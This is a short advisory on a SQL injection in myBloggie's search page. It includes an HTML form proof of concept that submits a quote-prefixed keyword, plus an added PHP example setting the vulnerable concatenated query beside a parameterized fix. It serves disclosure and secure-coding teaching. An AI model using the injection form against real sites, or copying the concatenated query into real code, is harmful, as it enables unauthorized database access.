MyBloggie Search.PHP SQL Injection Vulnerability
No exploit is required. An example proof of concept has been supplied:

<HTML><BODY>
<form action="http://www.example.com/myBloggie/index.php?mode=search" method="post" name="search" onsubmit="return checkForm(this)">
<center>
<input type="text" name="keyword" size="12" value="'SQLInjection">
<input type="submit" value="Inject this">
</center>
</form>
</BODY></HTML>
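
Why the single quote in the keyword field matters, as an added example that is not myBloggie's code or part of the original advisory: the posts table, its columns and the LIKE query are assumptions standing in for the search code, run here against in-memory SQLite through PDO. It puts the concatenated query next to a bound-parameter version.

```php
<?php
// Added illustration. Table, columns and query shape are assumptions,
// not myBloggie's actual code. In-memory SQLite keeps it runnable offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, subject TEXT, message TEXT)");
// Constructed sample rows.
$db->exec("INSERT INTO posts (subject, message) VALUES
           ('Hello', 'First post'), ('O''Reilly', 'Book notes')");

// Vulnerable pattern: the POSTed keyword is concatenated into the SQL text,
// so a quote in the keyword ends the string literal early.
function search_concat(PDO $db, string $keyword): array {
    $sql = "SELECT id, subject FROM posts WHERE subject LIKE '%" . $keyword . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the SQL text is constant and the keyword is a bound
// parameter. LIKE wildcards in the keyword are escaped to match literally.
function search_bound(PDO $db, string $keyword): array {
    $escaped = strtr($keyword, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $stmt = $db->prepare(
        "SELECT id, subject FROM posts WHERE subject LIKE :kw ESCAPE '\\'"
    );
    $stmt->execute([':kw' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$keyword = "'SQLInjection"; // value taken from the proof of concept form

try {
    search_concat($db, $keyword);
    echo "concat: query ran\n";
} catch (PDOException $e) {
    // The quote altered the statement's syntax instead of being searched for.
    echo "concat: keyword changed the SQL: ", $e->getMessage(), "\n";
}

// The same keyword is treated purely as data here.
echo "bound: ", count(search_bound($db, $keyword)), " rows for the PoC keyword\n";
// A legitimate keyword that contains a quote still works.
echo "bound: ", count(search_bound($db, "O'Re")), " rows for keyword O'Re\n";
```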